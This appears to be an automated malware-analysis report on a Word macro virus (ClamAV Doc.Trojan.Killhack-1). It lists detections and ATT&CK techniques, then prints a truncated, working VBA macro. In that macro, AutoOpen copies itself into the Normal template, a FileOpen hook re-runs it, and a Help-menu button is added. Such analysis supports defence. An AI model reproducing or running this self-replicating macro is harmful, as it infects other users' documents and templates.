MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Killhack-1. It contains VBA macros, including an AutoOpen subroutine, which attempts to copy itself to the Normal template. The script also modifies the 'Help' menu, suggesting an attempt to establish persistence or provide a backdoor for further actions. The embedded URL is benign, but the overall behavior indicates a malicious macro downloader.
Heuristics 5
-
ClamAV: Doc.Trojan.Killhack-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Killhack-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://come.to/un2mu In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15884 bytes |
SHA-256: 67f099873d99bcc50a9f728d8cdfb14160d36cee6c7034e1579b13cc29d3c28c |
|||
|
Detection
ClamAV:
Doc.Trojan.Killhack-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Kill_S129"
Dim Infected As Boolean
Dim NT, AD As Object
Sub AutoOpen()
Dim installed As Boolean
Dim im As Object
Dim abt As CommandBarButton
Dim i
Dim oke As Boolean
Set AD = ActiveDocument
Set NT = NormalTemplate
installed = False
For Each im In NT.VBProject.VBComponents
If im.Name = "Kill_S129" Then installed = True
Next
If Not (installed) Then
Application.OrganizerCopy Source:=AD.FullName, Destination:=NT.FullName, Name:="Kill_S129", Object:=wdOrganizerObjectProjectItems
End If
Search_and_Kill
oke = False
For Each i In CommandBars("Help").Controls
If i.Type = msoControlButton Then If i.Caption = "About Un2mU" Then oke = True
Next
If Not (oke) Then
Set abt = CommandBars("Help").Controls.Add(Type:=msoControlButton)
abt.Caption = "About Un2mU"
abt.OnAction = "AboutUn2mU"
abt.Enabled = True
abt.Visible = True
abt.Width = 79
abt.Height = 19
abt.Style = msoButtonIconAndCaption
End If
End Sub
Sub FileOpen()
Aof
Dialogs(wdDialogFileOpen).Show
Search_and_Kill
Aon
End Sub
Sub RepairMenu()
Dim IC As CommandBarControl
Dim damaged As Boolean
On Error Resume Next
damaged = False
For Each IC In CommandBars("Help").Controls
If IC.Caption = "Assalamu'alaikum Wr. Wb....." Then damaged = True
Next
If Not (damaged) Then
For Each IC In CommandBars("Tools").Controls
If IC.Caption = "Makmu, Cok.....!!!!" Then damaged = True
Next
End If
If damaged Then
MsgBox "Repair WORD from S129-effect", vbOKOnly, "Un2mU Virii division"
CommandBars("Help").Controls("Assalamu'alaikum Wr. Wb.....").Caption = ("About Microsoft Word")
CommandBars("Tools").Controls("Makmu, Cok.....!!!!").Caption = ("Macro")
CommandBars("Tools").Controls("Tempe dan Tahu Enak...!!!").Caption = ("Templates and Add-ins...")
CommandBars("Tools").Controls("Macro").Visible = True
CommandBars("Tools").Controls("Macro").Enabled = True
CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = True
End If
Options.VirusProtection = True
Aon
End Sub
Sub Search_and_Kill()
Dim im As Object
On Error Resume Next
Set AD = ActiveDocument
Set NT = NormalTemplate
For Each im In NT.VBProject.VBComponents
If im.Name = "S129" Or im.Name = "S129Form" Then
MsgBox "Found & Kills virus S129 at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
ElseIf im.Name = "astia" Then
MsgBox "Found & Kills virus Titasic at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
MsgBox "Found & Kills virus CyberHack/Dwiganteng at Normal template", vbOKOnly, "Un2mU WM-AV Ver 1.3"
Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
End If
Next
For Each im In AD.VBProject.VBComponents
If im.Name = "S129" Or im.Name = "S129Form" Then
MsgBox "Found & Kills virus S129 at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
ElseIf im.Name = "astia" Then
MsgBox "Found & Kills virus Titasic at " & AD.FullName, vbOKOnly, "Un2mU WM-AV Ver 1.3"
Application.OrganizerDelete Source:=NT.FullName, Name:=im.Name, Object:=wdOrganizerObjectProjectItems
ElseIf im.Name = "CyberHack" Or im.Name = "CyberForm" Then
MsgBox "Found & Kills virus CyberHack/Dwiganteng at " & AD.FullName, vbOKOnly, "Un2mU Virii division"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.